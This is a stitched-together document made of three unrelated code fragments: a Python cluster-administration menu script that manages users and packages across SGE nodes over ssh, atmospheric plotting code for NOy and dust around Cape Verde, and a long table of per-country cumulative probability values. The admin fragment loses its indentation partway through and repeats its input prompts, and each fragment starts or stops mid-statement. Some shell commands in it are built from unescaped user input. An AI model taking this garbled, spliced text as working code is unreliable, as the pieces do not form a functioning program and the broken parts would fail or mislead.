        print("Archiving %s's home directory to %s" % (username, archivedir))
        os.system("tar -zcf %s.tar.gz %s" % (archive, homedir))
    # Remove the user and home dir from the head node.
    print("Removing %s from %s" % (username, HEAD_NODE))
    os.system("userdel -r %s" % username)
    # Remove the account entry from all compute nodes; no -r there because
    # node accounts are created without -m (see addSystemUser).
    for node in nodes:
        print("Removing %s from %s" % (username, node))
        ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
        command = "userdel %s" % username
        proc = subprocess.Popen(["ssh", ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        if proc.returncode != 0:
            print("Failed to execute on %s! \nERROR\n%s" % (node, err))
# Get the next available UID based on the range provided above
def getNextUID():
    """Return the first unused UID in [UID_MIN, UID_MAX), as a string."""
    # awk marks every UID in use, then prints the first free value in range.
    awk_script = """awk -F: '{uid[$3]=1}END{for(x=%s; x<%s; x++) {if(uid[x] != ""){}else{print x; exit;}}}' /etc/passwd""" % (UID_MIN, UID_MAX)
    return subprocess.check_output(awk_script, shell=True).decode('ascii').strip()
# Get the next available UID based on the range provided above
def getNextGID(project):
    """
    Return the first unused GID from /etc/group, as a string.

    @param project: if truthy, allocate from the project range starting at
        PROJECT_GID_MIN instead of GID_MIN.
    """
    # Bug fix: the original assigned to GID_MIN inside the "if", which made
    # GID_MIN local to the function and raised UnboundLocalError whenever
    # project was false. Use a separate local for the lower bound.
    gid_min = PROJECT_GID_MIN if project else GID_MIN
    # awk marks every GID in use, then prints the first free value in range.
    cmd = """awk -F: '{gid[$3]=1}END{for(x=%s; x<%s; x++) {if(gid[x] != ""){}else{print x; exit;}}}' /etc/group""" % (gid_min, GID_MAX)
    gid = subprocess.check_output(cmd, shell=True).decode('ascii').strip()
    return gid
# Get a list of groups from the range provided above
def getGroups():
    """
    Return {group_name: gid_string} for local groups whose GID falls in
    [GID_MIN, GID_MAX).
    """
    groups = {}
    # Use a context manager so /etc/group is closed promptly (the original
    # left the handle open until garbage collection).
    with open('/etc/group', 'r') as group_file:
        for line in group_file:
            # /etc/group fields: name:password:gid:members
            parts = line.strip('\n').split(':')
            if int(parts[2]) >= GID_MIN and int(parts[2]) < GID_MAX:
                groups[parts[0]] = parts[2]
    return groups
# Get a list of nodes from SGE... actually execution hosts
def getNodes():
    """Return the SGE execution hosts (`qconf -sel`), excluding HEAD_NODE."""
    proc = subprocess.Popen(["qconf", "-sel"], shell=False, stdout=subprocess.PIPE)
    # One hostname per output line; drop the head node from the list.
    hostnames = (line.rstrip().decode('ascii') for line in proc.stdout)
    return [name for name in hostnames if name != HEAD_NODE]
# Initialize the node and group lists once at startup.
nodes = getNodes()
groups = getGroups()
# Bring up interfaces before we start (nodes keep their external
# interfaces down unless needed; see EXTERNAL_INTERFACE above).
print("Bringing up interfaces (this can take a minute or two)...")
ifup()
# Loop until user wants to quit.
selection = True
while selection:
os.system('clear')
print(menu)
print("Please make sure no jobs are running on the cluster before attempting any maintenance that would adversly affect performance.")
#print("Nodes in this cluster: %s" % nodes)
selection = input("What would you like to do? ")
os.system('clear')
#
# Update/update all nodes
#
if selection == "1":
print("\nUpdate/Upgrade All Nodes\n")
print("\nWARNING!!!\n")
print("You are about to perform an update/upgrade on all nodes.")
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("apt-get update")
execute("apt-get -y upgrade")
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Install package(s) on all nodes
#
elif selection == "2":
print("\nInstall package(s) on All Nodes\n")
packages = input("Package(s) to install from apt-get... separated by a single space: ")
print("\nWARNING!!!\n")
print("You are about to install the following packages on all nodes.\n%s" % packages)
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("apt-get install -y %s" % packages)
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Execute an R script on all nodes
#
elif selection == "3":
print("\nExecute An R Script On All Nodes (The script must specify a CRAN mirror)\n")
print("Script must be somewhere inside the home directory and must be executable.\n")
full_path = input("Full path to script: ")
print("\nWARNING!!!\n")
print("You are about to execute an R script on all nodes.")
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("Rscript " + full_path)
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Add a system user to all nodes (including head)
#
elif selection == "4":
print("\nAdd A System User To All Nodes (including head node)\n")
fullname = input("Full Name: ")
username = input("Username (lowercase recommended): ")
print("\nAdd A System User To All Nodes (including head node)\n")
fullname = input("Full Name: ")
avail_grps = "Available Groups: "
for group, gid in groups.items():
avail_grps = "%s %s=%s" % (avail_grps, group, gid)
print(avail_grps)
gid = input("Select a GID (eg. 1500): ")
print("\nWARNING!!!\n")
print("You are about to add the following system user to all nodes (including %s)." % HEAD_NODE)
print("Full Name[%s], | |
vars2use = ['NOy', 'PM2.5(dust)', ]
# Now loop and plot
for var in vars2use:
# for var in vars2use[:2]: # For testing
# Plot up by level
# for lev2use in ds.lev.values:
for lon2use in list(ds.lon.values):
if verbose:
print(var, lev2use)
# Get units for species
units = ds[var].units
# Select for level and variable, and average over time
ds_tmp = ds.sel(lon=lon2use).mean(dim='time')
# Get the LateX for of the species name
try:
LaTeX_spec = AC.latex_spec_name(var)
except KeyError:
print('WARNING: not converted {} to LaTeX form'.format(var))
LaTeX_spec = var
# Set title
title = 'Average [{}] @ {:.0f}hPa in Feb {}'.format(
LaTeX_spec, lev2use, year)
# Plot up and add title
# quick_map_plt_CV_1layer(ds_tmp, var2plot=var, title=title,
# use_local_CVAO_area=use_local_CVAO_area,
# save_plot=False, units=units)
# vertical plot
del ds_tmp
# Save to PDF
AC.plot2pdfmulti(pdff, savetitle, dpi=dpi, tight=True)
if show_plot:
plt.show()
plt.close()
# Save entire pdf
AC.plot2pdfmulti(pdff, savetitle, close=True, dpi=dpi)
plt.close('all')
def quick_map_plt_CV_1layer(ds, var2plot=None, extra_str='',
                            projection=ccrs.PlateCarree(),
                            save_plot=True, show_plot=False,
                            savename=None, units=None, title=None,
                            LatVar='lat', LonVar='lon', fig=None,
                            ax=None, extents=None, region='Cape_Verde',
                            use_local_CVAO_area=True,
                            add_flyable_range_as_circle=True,
                            add_flyable_range=False,
                            add_detailed_map=True, add_ARNA_locs=True,
                            extend='neither', folder='./', dpi=320):
    """
    Plot up a quick spatial plot of data using cartopy

    Parameters
    -------
    ds (xr.Dataset): dataset object holding data to plot
    var2plot (str): variable to plot within the dataset
    LatVar, LonVar (str): variables to use for latitude and longitude
    save_plot (bool): save the plot as a .png ?
    show_plot (bool): show the plot on screen
    dpi (int): resolution to use for saved image (dots per square inch)
    savename (str): name to use for png of saved .png
    extra_str (str): extra string to append to save .png
    projection (cartopy.crs obj.): projection to use
    fig (figure instance): matplotlib figure instance
    ax (axis instance): axis object to use
    units (str): label for the colour bar (colour bar untouched if None)
    title (str): title for the plot (no title added if None)
    extents (tuple): (x0, x1, y0, y1) plot extent; derived from the data
        (or the local CVAO area) when None
    use_local_CVAO_area (bool): limit the plotted area to the CVAO region
    add_ARNA_locs (bool): mark known places to help geo-locate viewers
    add_flyable_range (bool): show the BAE146 flyable range as a box
    add_flyable_range_as_circle (bool): show the flyable range as circles
    add_detailed_map (bool): add country borders and 10m land outlines
    extend (str): colour bar extension setting (e.g. 'neither', 'both')
    folder (str): folder to save the .png into
    region (str): NOTE(review): accepted but currently unused here

    Returns
    -------
    (None)
    """
    # Use the 1st data variable if no variable was given
    if isinstance(var2plot, type(None)):
        pstr = 'WARNING: No variable to plot(var2plot), trying 1st data_var'
        print(pstr)
        var2plot = list(ds.data_vars)[0]
    # Setup figure and axis and plot
    if isinstance(fig, type(None)):
        fig = plt.figure(figsize=(10, 6))
        # fig = plt.figure()
    if isinstance(ax, type(None)):
        ax = fig.add_subplot(111, projection=projection, aspect='auto')
    # Setup plotted range (per-variable vmin/vmax)
    vmin, vmax = set_limits4ar_plotted_range(var2plot)
    # Now plot up
    ds[var2plot].plot.imshow(x=LonVar, y=LatVar, ax=ax,
                             transform=ccrs.PlateCarree(),
                             vmin=vmin, vmax=vmax, extend=extend)
    # Add some grid lines
    gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
                      linewidth=.5, color='gray', alpha=0.25, linestyle='--')
    gl.xlabels_top = False
    gl.ylabels_right = False
    # Limit plot to Cape Verde region (overrides any passed extents)
    if use_local_CVAO_area:
        d = get_analysis_region('local_CVAO_area')
        extents = (d['x0'], d['x1'], d['y0'], d['y1'])
    # Mark known places to help geo-locate viewers
    if add_ARNA_locs:
        # colours = AC.get_CB_color_cycle()
        locs2plot = 'Praia Airport', 'Dakar', 'Sao Vicente Airport',
        for loc2plot in locs2plot:
            lon, lat, alt = AC.get_loc(loc2plot)
            # Now plot up locations as hollow circles with black edges
            ax.plot(lon, lat, 'bo', markersize=5, markerfacecolor='none',
                    markeredgewidth=2,
                    zorder=10,
                    markeredgecolor='black',
                    transform=ccrs.PlateCarree())
            # Add a label for the location?
            # ax.text(lon, lat+0.25, loc2plot, transform=ccrs.PlateCarree())
    # Add a box to show the flyable range
    if add_flyable_range:
        # Get the min/max lat and lon of the flyable range
        d = get_max_flying_range4BAE146()
        min_lon = d['min_lon']
        max_lon = d['max_lon']
        min_lat = d['min_lat']
        max_lat = d['max_lat']
        # Create corner lists for the bounding box
        lons = [min_lon, min_lon, max_lon, max_lon]
        lats = [min_lat, max_lat, max_lat, min_lat]
        # Now plot as a linear ring
        ring = LinearRing(list(zip(lons, lats)))
        ax.add_geometries([ring], ccrs.PlateCarree(),
                          facecolor='none', edgecolor='grey',
                          zorder=10, linestyle=':',
                          )
    if add_flyable_range_as_circle:
        # n_points = 1000
        # Approximate from James' max distance
        # ( 16.8331-13 ) *110667.45
        locs4circles = 'Dakar', 'Sao Vicente Airport',
        for loc in locs4circles:
            # Get locations to centre circle on
            lon, lat, alt = AC.get_loc(loc)
            # Radius in degrees
            # radius = 16.8331-13
            radius = 21 - 16.8331
            # Plot up circle
            ax.add_patch(mpatches.Circle(xy=[lon, lat],
                                         radius=radius,
                                         transform=projection,
                                         facecolor='none',
                                         edgecolor='grey',
                                         linestyle=':',
                                         zorder=10
                                         ))
    # Get limits of plotting data (fall back to the data's bounding box)
    if isinstance(extents, type(None)):
        x0 = float(ds[LonVar].min())
        x1 = float(ds[LonVar].max())
        y0 = float(ds[LatVar].min())
        y1 = float(ds[LatVar].max())
        extents = (x0, x1, y0, y1)
    ax.set_extent(extents, crs=ccrs.PlateCarree())
    # Beautify the figure/plot
    if add_detailed_map:
        # Add borders for countries
        ax.add_feature(cfeature.BORDERS, edgecolor='grey',
                       facecolor='none', zorder=50)
        # Also add minor islands (inc. Cape Verde) via 10m land outlines
        land_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m',
                                                edgecolor=None,
                                                facecolor='none')
        ax.add_feature(land_10m, edgecolor='grey', facecolor='none', zorder=50)
    # Update the colour bar label (last image on the axis holds it)
    if not isinstance(units, type(None)):
        im = ax.images
        cb = im[-1].colorbar
        cb.set_label('{}'.format(units))
    # Add the title if one was provided
    if not isinstance(title, type(None)):
        plt.title(title)
    # Save the plot?
    if save_plot:
        if isinstance(savename, type(None)):
            savename = 'spatial_plot_{}_{}'.format(var2plot, extra_str)
        savename = AC.rm_spaces_and_chars_from_str(savename)
        plt.savefig(folder+savename+'.png', dpi=dpi)
    if show_plot:
        plt.show()
def plot_spatial_concs_2layer(ds, show_plot=False, folder=None,
                              var2plot1='NOy', var2plot2='PM2.5(dust)',
                              extr_title_str='', region='Cape_Verde',
                              add_max_vals_as_txt=False,
                              testing_mode=False,
                              verbose=False, testing=False):
    """
    Plot up a two layer plot on a single map for given levels

    Parameters
    -------
    ds (xr.Dataset): dataset holding the variables to plot (needs lev/time)
    var2plot1, var2plot2 (str): the two variables to overlay
    folder (str): folder to save plots to (passed to quick_map_plt_2layer)
    extr_title_str (str): extra string appended to each plot title
    region (str): region name passed through to the plotting routine
    add_max_vals_as_txt (bool): annotate plots with maximum values
    testing_mode (bool): only plot one level and the first four times
    show_plot, verbose, testing: NOTE(review): accepted but unused here

    Returns
    -------
    (None)
    """
    # Local variables: LaTeX names for the species (fall back to raw name)
    try:
        LaTeX_spec1 = AC.latex_spec_name(var2plot1)
    except KeyError:
        LaTeX_spec1 = var2plot1
    try:
        LaTeX_spec2 = AC.latex_spec_name(var2plot2)
    except KeyError:
        LaTeX_spec2 = var2plot2
    # Set data below the plotting threshold to NaN, based on variable name
    ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
    ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
    # Set lists of levels/times to loop and plot
    if testing_mode:
        levs2use = [700]
        times2use = ds.time[:4]
    else:
        levs2use = ds.lev.values
        times2use = ds.time.values
    # Plot up by level and time
    for time2use in times2use:
        for lev2use in levs2use:
            # Get time as human readable string
            dstr = AC.dt64_2_dt([time2use])[0].strftime('%Y/%m/%d %H:%M')
            # Print out status
            pstr = "'plotting 2layer @ {:.0f}hPa on {}"
            print(pstr.format(lev2use, dstr))
            # Select the single level and time to plot
            ds_tmp = ds.sel(lev=lev2use, time=time2use)
            # Set title
            title = '[{}] & [{}] @ {:.0f}hPa on {}'.format(
                LaTeX_spec1, LaTeX_spec2, lev2use, dstr)
            # Add extra string to existing title string
            title += '\n ' + extr_title_str
            # Save plots
            extra_str = 'lev_{}_dt_{}'.format(lev2use, dstr)
            quick_map_plt_2layer(ds_tmp, var2plot1=var2plot1,
                                 folder=folder, region=region,
                                 var2plot2=var2plot2, title=title,
                                 add_max_vals_as_txt=add_max_vals_as_txt,
                                 save_plot=True, extra_str=extra_str)
    # Tidy up...
    plt.close('all')
def set_values_below_range2NaNs4spec(var=None, ds=None):
    """
    Set values below a species-specific threshold to NaN (in place).

    To improve the aesthetics of plots, values below a threshold are
    removed before plotting.

    Parameters
    -------
    var (str): name of the variable in the dataset to threshold
    ds (xr.Dataset): dataset holding the data to update

    Returns
    -------
    (xr.Dataset): the dataset with sub-threshold values replaced by NaN

    Notes
    -------
    - NOy values below 0.5 pptv are removed.
    - Dust values below 15 are removed; the match is now case-insensitive,
      so 'PM2.5(dust)' is caught too (the original case-sensitive
      `'Dust' in var` silently skipped the default 'PM2.5(dust)' name).
    - Any other variable is left unchanged, with a printed warning.
    """
    # Limit plotted NOy values to those above 0.5 pptv
    if var == 'NOy':
        arr = ds[var].values
        # np.nan (np.NaN was removed in NumPy 2.0)
        arr[arr < 0.5] = np.nan
        ds[var].values = arr
    # Limit dust values to those above 15 (case-insensitive match)
    elif 'dust' in var.lower():
        arr = ds[var].values
        arr[arr < 15] = np.nan
        ds[var].values = arr
    else:
        pstr = "WARNING: No case set for '{}', so not restricting array values"
        print(pstr.format(var))
    return ds
def plt_spatial_2layer_vertical_lon(ds, show_plot=False, folder=None,
                                    var2plot1='NOy',
                                    var2plot2='PM2.5(dust)',
                                    extr_title_str=None,
                                    testing_mode=False,
                                    ):
    """
    Plot two-layer vertical cross sections along longitudes.

    For every time and longitude in ds (a reduced subset when
    testing_mode=True), plot var2plot1 and var2plot2 together as a
    two-layer plot and save it via quick_lon_plot_2layer.

    Parameters
    ----------
    ds (xr.Dataset): dataset with the variables to plot (lon/time coords)
    show_plot (bool): unused; kept for interface compatibility
    folder (str): directory to save plots to (passed to the plotter)
    var2plot1, var2plot2 (str): names of the variables to plot
    extr_title_str (str): optional extra text appended to each title
    testing_mode (bool): if True, only plot one longitude & first 4 times

    Returns
    -------
    (None) - plots are saved to disk
    """
    # Human-readable LaTeX names (fall back to the raw variable names)
    try:
        LaTeX_spec1 = AC.latex_spec_name(var2plot1)
    except KeyError:
        LaTeX_spec1 = var2plot1
    try:
        LaTeX_spec2 = AC.latex_spec_name(var2plot2)
    except KeyError:
        LaTeX_spec2 = var2plot2
    # Mask values below the per-species plotting threshold
    ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
    ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
    # Set lists of longitudes and times to loop and plot
    if testing_mode:
        lons2use = [-24.]
        times2use = ds.time[:4]
    else:
        lons2use = ds.lon.values
        times2use = ds.time.values
    # Plot by time and lon
    for time2use in times2use:
        for lon2use in lons2use:
            # Get time as human readable string
            dt = AC.dt64_2_dt([time2use])[0]
            dstr = dt.strftime('%Y/%m/%d %H:%M')
            # Print out status
            # NB: raw strings keep the literal '\circ' for matplotlib's
            # mathtext without emitting an invalid '\c' escape warning
            pstr = "plotting 2layer @ {:.1f}$^{}$W on {}"
            print(pstr.format(lon2use*-1, r'{\circ}', dstr))
            # Select for longitude and time
            ds_tmp = ds.sel(lon=lon2use, time=time2use)
            # Set title
            title_str = '[{}] & [{}] @ {:.1f}$^{}$W on {}'
            title = title_str.format(LaTeX_spec1, LaTeX_spec2, lon2use*-1,
                                     r'{\circ}', dstr)
            if extr_title_str is not None:
                title += extr_title_str
            # Filesystem-safe timestamp for the saved filename -
            # '/' and ':' in dstr would break the save path
            fstr = dt.strftime('%Y%m%d_%H%M')
            extra_str = 'lon_{}E_dt_{}'.format(lon2use, fstr)
            # Use the LaTeX names in the plotted labels for both variables
            for var_, name_ in ((var2plot1, LaTeX_spec1),
                                (var2plot2, LaTeX_spec2)):
                attrs = ds_tmp[var_].attrs
                attrs['long_name'] = name_
                ds_tmp[var_].attrs = attrs
            # Now call plotter
            quick_lon_plot_2layer(ds_tmp, var2plot1=var2plot1,
                                  folder=folder,
                                  var2plot2=var2plot2, title=title,
                                  save_plot=True, extra_str=extra_str
                                  )
            # Close per iteration so figures do not accumulate in memory
            # over the full lon x time loop
            plt.close('all')
def plt_spatial_2layer_vertical_lat(ds, show_plot=False, folder=None,
var2plot1='NOy',
var2plot2='PM2.5(dust)',
extr_title_str=None,
testing_mode=False,
):
"""
Plot up a two layer plot on a single map for given levels
"""
# Local variables
try:
LaTeX_spec1 = AC.latex_spec_name(var2plot1)
except KeyError:
LaTeX_spec1 = var2plot1
try:
LaTeX_spec2 = AC.latex_spec_name(var2plot2)
except KeyError:
LaTeX_spec2 = var2plot2
# Set data below threshold to zero based on variable name
ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
# Set lists of variables to loop and plot
if testing_mode:
lats2use = [16.]
times2use = ds.time[:4]
else:
lats2use = ds.lat.values
times2use = ds.time.values
# Plot up by level and time
for time2use in times2use:
for lat2use in lats2use:
# Get time as human readable string
dstr = | |
0.020043961872515337,
0.03349805785639342,
0.05492093713529983,
0.07197670056780921,
0.11082793065442348,
0.1726905197856368,
0.2474840042903689,
0.3194774175219229,
0.43857065063945483,
0.4878223722128196,
0.49687497006014864,
0.4978109091076936,
0.49787578355651946,
0.612510479368423,
0.7073262127729109,
0.7985922945852948,
0.8247333717910478,
0.8750582198992454,
0.923499038102326,
0.9271026379108194,
0.9375087094497486,
0.9575417006489176,
0.9768247093657345,
0.977139869474318,
0.9783704377996956,
0.9820076553270808,
0.9893397802247202,
1.0],
'GER': [0.0009004606909934688,
0.002114028415816856,
0.003191250529944268,
0.0038460104903161527,
0.00414777762073264,
0.0067899540496156085,
0.011742187616986595,
0.01638317544764487,
0.01928271128351923,
0.029447358503363767,
0.048498965584681725,
0.06635318740520439,
0.09568129698215659,
0.15065099814473942,
0.20706469637773267,
0.2613216088454941,
0.3670578522677689,
0.4185727314995056,
0.4297274593029854,
0.43108610993464314,
0.43119798824991995,
0.5328917662457948,
0.6319825325245769,
0.7272849005796986,
0.7594696948225171,
0.8213783311545428,
0.8809201014634555,
0.8861469304574823,
0.9012279273835276,
0.930236780047772,
0.9581365779531252,
0.958680556464165,
0.9608082140469829,
0.9671182915443932,
0.9799328386340234,
1.0],
'ICE': [0.020015632485829295,
0.032685374382500014,
0.038855898651463,
0.040912942694583794,
0.04143282825391651,
0.06949622446436116,
0.09833298535657736,
0.11314870424746053,
0.11822337328013781,
0.17829311890893026,
0.2400182529078238,
0.27173132350017853,
0.3681658653010618,
0.467257928243448,
0.5704670757102871,
0.6256969130792771,
0.7317502747277518,
0.7826616844509008,
0.7935240218407631,
0.7948276507423141,
0.7949333374491911,
0.8516851860986713,
0.9061731641170727,
0.9353310657021847,
0.952769203954861,
0.9714323857241459,
0.98141952852306,
0.9842099483255415,
0.9886896219493873,
0.9934839963199467,
0.9960495878713848,
0.9963354585262875,
0.9969574253718334,
0.9979833312812594,
0.9991416152795768,
1.0],
'IRN': [0.0017932806937065308,
0.0029800022035628973,
0.0034684714452978597,
0.0036040805695554683,
0.003632449451972191,
0.010203701802837323,
0.015741444346236217,
0.018074834607297537,
0.018730301471607442,
0.04505278130621857,
0.06723532865713482,
0.07658219510109027,
0.15566220614559337,
0.22230471477424846,
0.3806902008959091,
0.539301472459069,
0.6727764933411026,
0.7008570657743881,
0.7034826708184224,
0.7036207649953946,
0.7036255239216673,
0.8372908192869065,
0.8935320243231262,
0.94985340365827,
0.9577414475350371,
0.9735400247920338,
0.9893611236122646,
0.9899142877573227,
0.9915761458715838,
0.9949046002030375,
0.9982377993917955,
0.9982617405693633,
0.9983583224087909,
0.9986519163327938,
0.9992538684360962,
1.0],
'JPN': [0.020333426930712488,
0.0341911696223374,
0.04159567992238613,
0.044313123995475136,
0.04507029299543652,
0.07159939570722547,
0.10171925546877919,
0.11881757126768709,
0.1252884381192952,
0.18070199499124434,
0.2436158665987565,
0.2793305496481871,
0.36614074971112237,
0.4647008510524358,
0.5553647157619475,
0.6027090160751905,
0.7056443818189208,
0.7615945672197578,
0.775110808314978,
0.7769474856069272,
0.777117306599973,
0.8308697346951034,
0.8893036518612434,
0.9198176050404603,
0.9409919829329735,
0.9631063304539229,
0.9746543525200219,
0.978490774078585,
0.9845008651433803,
0.9907777552184569,
0.9940555216108315,
0.9945044289275082,
0.9954596157736768,
0.9970026939148475,
0.9987148680415886,
1.0],
'KOR': [0.017904881928060824,
0.028424635310151856,
0.033042933059789364,
0.034425331227746124,
0.03473853193234269,
0.0628037483016792,
0.08859226057248232,
0.10044050995686939,
0.10406954219159724,
0.1672159586954447,
0.2252398169631447,
0.25189824284598955,
0.35845728014689193,
0.4563720442746935,
0.5762503531232865,
0.6436815597877116,
0.7538351106480132,
0.7988209761224275,
0.8069862572299834,
0.8078199167774889,
0.8078769468023982,
0.8698380048472073,
0.9204468467789786,
0.948914175957426,
0.9626930179295496,
0.9781941365146009,
0.9869134714875234,
0.9887891959542945,
0.9919544649352937,
0.9955153744752477,
0.9975183759307089,
0.9976802588203123,
0.9980495675593898,
0.9986872678013556,
0.9994380577136132,
1.0],
'MAR': [0.0038324841701699703,
0.006964850571808668,
0.008684492195714232,
0.009326535969497769,
0.009507782127440273,
0.019102674623302066,
0.030070275220585828,
0.03633862387136117,
0.038727003745892594,
0.06907428123149861,
0.10376323880143694,
0.1235891322091689,
0.1955772173689746,
0.2778643890216556,
0.39170841577569576,
0.4817265236250979,
0.6118578217468137,
0.658887678170738,
0.6664417833183155,
0.6671243026000518,
0.667165401571737,
0.7700620889334004,
0.8444364554841771,
0.9032453358469862,
0.921164754316332,
0.9495030376740912,
0.9719105255353295,
0.974069236749766,
0.9791900086810862,
0.9872881445803315,
0.9936914570029705,
0.9938552743746943,
0.9943797761085063,
0.995649506114159,
0.9977399433650737,
1.0],
'MEX': [0.005337418714145114,
0.009682915641264233,
0.01212938047930288,
0.013068360667741129,
0.013341125659747216,
0.025012507555658405,
0.038762005839609925,
0.04686081987664417,
0.05004109537721866,
0.08390794223680045,
0.1238048590656295,
0.14730518637756157,
0.2210087542009344,
0.30783541177638296,
0.4147682268765998,
0.4923399597176726,
0.6183124084671744,
0.6694555802861476,
0.6786837851645237,
0.6796204178813606,
0.6796840974512717,
0.7710676557217047,
0.8452687222000981,
0.8990960276908423,
0.91917913808377,
0.9483167170871459,
0.9694538440950454,
0.9721716710899713,
0.9780864096861933,
0.9866678076748446,
0.992892967945382,
0.9931260697814999,
0.9938118272684908,
0.9953387257783045,
0.9976564817276596,
1.0],
'NGA': [0.010648675373241106,
0.01715405196386166,
0.019966048344624246,
0.020792095784669583,
0.020975514376547537,
0.041750597411956525,
0.060420926990323365,
0.06881033284662533,
0.07132348721905109,
0.12494281399137983,
0.17312988986988637,
0.1947824769266046,
0.2985738383841345,
0.39184994815932356,
0.5257897961168704,
0.6122126092439121,
0.7325828191141467,
0.7744959057747992,
0.7809822165777321,
0.7815468523524067,
0.7815795618816944,
0.8592467558669774,
0.9133344215062456,
0.9482337310940986,
0.9607893350078076,
0.9769919905621959,
0.9874465273896721,
0.9889038207279475,
0.9917247151465743,
0.9953650004673308,
0.9977138436443409,
0.9978202018907711,
0.9980979560789768,
0.9986462307681805,
0.9993817324936233,
1.0],
'PAN': [0.03581194327227596,
0.05110512340939498,
0.05622184337882768,
0.057385852504986214,
0.0575860512128584,
0.10499146118976872,
0.13800130075398925,
0.14949418214227717,
0.15216179730084792,
0.24447285090789844,
0.3087518661312049,
0.33113159010048315,
0.4659473836279662,
0.5598237516887609,
0.6910850143743292,
0.7549852393813398,
0.8463864786989205,
0.8790709745198394,
0.8842655370397237,
0.884729922583728,
0.8847575795953443,
0.9292532642993984,
0.961076006126901,
0.9765678604753433,
0.9841542657949855,
0.9915406492107962,
0.995136466838949,
0.9960407501025639,
0.9973614117242676,
0.9986472530007933,
0.9992732225001887,
0.9993410869896914,
0.999474844759244,
0.9996741577466434,
0.999876098080442,
1.0],
'PER': [0.004363065334594547,
0.007845896300614705,
0.009727158812499474,
0.01041840004337029,
0.010610456739643897,
0.021138213138184262,
0.032984083456783816,
0.03964859193764747,
0.04214823510987688,
0.07454062483291976,
0.1109886611896408,
0.131494393641295,
0.20624443098887504,
0.2903534486379417,
0.40535099654428064,
0.4938087183978387,
0.6232043833321347,
0.670524271728953,
0.678215313650727,
0.6789184655793066,
0.6789613311436017,
0.7784942859430951,
0.8512925255952373,
0.9072899494692025,
0.9250381204380593,
0.9523424029998268,
0.9733452389405283,
0.9755087361229118,
0.9805013129771445,
0.9881820328315177,
0.9940901499425593,
0.9942563793171604,
0.9947742081982919,
0.995993996186654,
0.9979485411482054,
1.0],
'POL': [0.010301958864491877,
0.01918502721562038,
0.02496565287950454,
0.027555267957594408,
0.028436883738041957,
0.043992913214702556,
0.06560408714079437,
0.08061572102733709,
0.08756734561173869,
0.12446500158393531,
0.17572497520873587,
0.21133136844405687,
0.2769700819547185,
0.3681584958165015,
0.4460033814027519,
0.4921638398260582,
0.6003096468383958,
0.6636512815070672,
0.6801399782370362,
0.6825543598790194,
0.6827960737882638,
0.7469243718858548,
0.8220450139567553,
0.8665900505244287,
0.8959224515213418,
0.9307095044273046,
0.9513375302409706,
0.9570642501179896,
0.9672517407717781,
0.9793336967081381,
0.986498054655002,
0.9872243261261501,
0.9889817417149088,
0.9922134617868721,
0.9963045752313038,
1.0],
'POR': [0.002125097936991622,
0.0043588029233337326,
0.005928312330776208,
0.00668122297983298,
0.006954747691890236,
0.01253815883847095,
0.02077156182576651,
0.026842127199831933,
0.029826050454705256,
0.04886948666336562,
0.07695129551686139,
0.09765627700874274,
0.14637010800461261,
0.2182044385087577,
0.30127898816084836,
0.37211493617408103,
0.49461822803583727,
0.5475823547888352,
0.557759673038185,
0.5588597103628401,
0.5589395944297281,
0.6633956143553299,
0.7537184423442558,
0.8307348471833602,
0.8567688126798044,
0.901166059109849,
0.9390226716731429,
0.9427745878529217,
0.9523721315257014,
0.968739384974728,
0.9826954030246612,
0.9830393266798895,
0.9842296759127459,
0.9873497173223406,
0.9929329757085167,
1.0],
'SEN': [0.011536875424868321,
0.018565473979297982,
0.0216200879805583,
0.022522750659971193,
0.022724419678738377,
0.044480853334088744,
0.0641605641660126,
0.07306117316662654,
0.07574484541020102,
0.13070955363445627,
0.18042770050309084,
0.20291389398897117,
0.30705961008044685,
0.4012642765957171,
0.5328193602195984,
0.6159084236818207,
0.7349061438596802,
0.7775124051938401,
0.7842923427596338,
0.7848992194950152,
0.7849354099635786,
0.8600933502829833,
0.9139128493759003,
0.9479047837995171,
0.9607512351981888,
0.9769786524309627,
0.9872277500951533,
0.9887609426770232,
0.9916659965653021,
0.9953356108475517,
0.9976533077816471,
0.9977685220908113,
0.9980631405519136,
0.9986327248949722,
0.999381476348388,
1.0],
'SRB': [0.009659570224542504,
0.01688068560341593,
0.02079080706209569,
0.02223774666966077,
0.022643408580371876,
0.03985210615761824,
0.05944790411608342,
0.07060491631602805,
0.07483980114502915,
0.11832114500888427,
0.16783399311920585,
0.196024498634304,
0.278422974276643,
0.37225133482077444,
0.4763497547383653,
0.5421063172527995,
0.6606447246682307,
0.7140665942706088,
0.724766909192587,
0.7259724906596615,
0.7260639398446146,
0.8009419082493696,
0.868432625417366,
0.9110649493864967,
0.9313423732219847,
0.9569599318578504,
0.9731419507322968,
0.9761881023710512,
0.9819606528330307,
0.9892534258764902,
0.9938601018175417,
0.99415189433233,
0.9949005295180249,
0.996355720494731,
0.9982887743085999,
1.0],
'SWE': [0.004674884432654913,
0.008801079332110441,
0.011325213756535883,
0.012379695770476455,
0.012713345241157095,
0.022887064370607255,
0.03595585189847154,
0.04434969515654127,
0.04794383651514449,
0.07781297204798239,
0.11618177120125096,
0.14082534929954194,
0.20659519556670963,
0.291080734794719,
0.38762794762474895,
0.4584914575330907,
0.5825124762803755,
0.6367759932548,
0.6473280729808402,
0.6484822986175773,
0.6485671732694319,
0.7395958465291461,
0.8192522790674569,
0.8777183313850854,
0.9009533078582936,
0.935061221225569,
0.9600956721020526,
0.9634843760303317,
0.970946076291554,
0.9818995208270287,
0.9899391058405969,
0.9902536842500569,
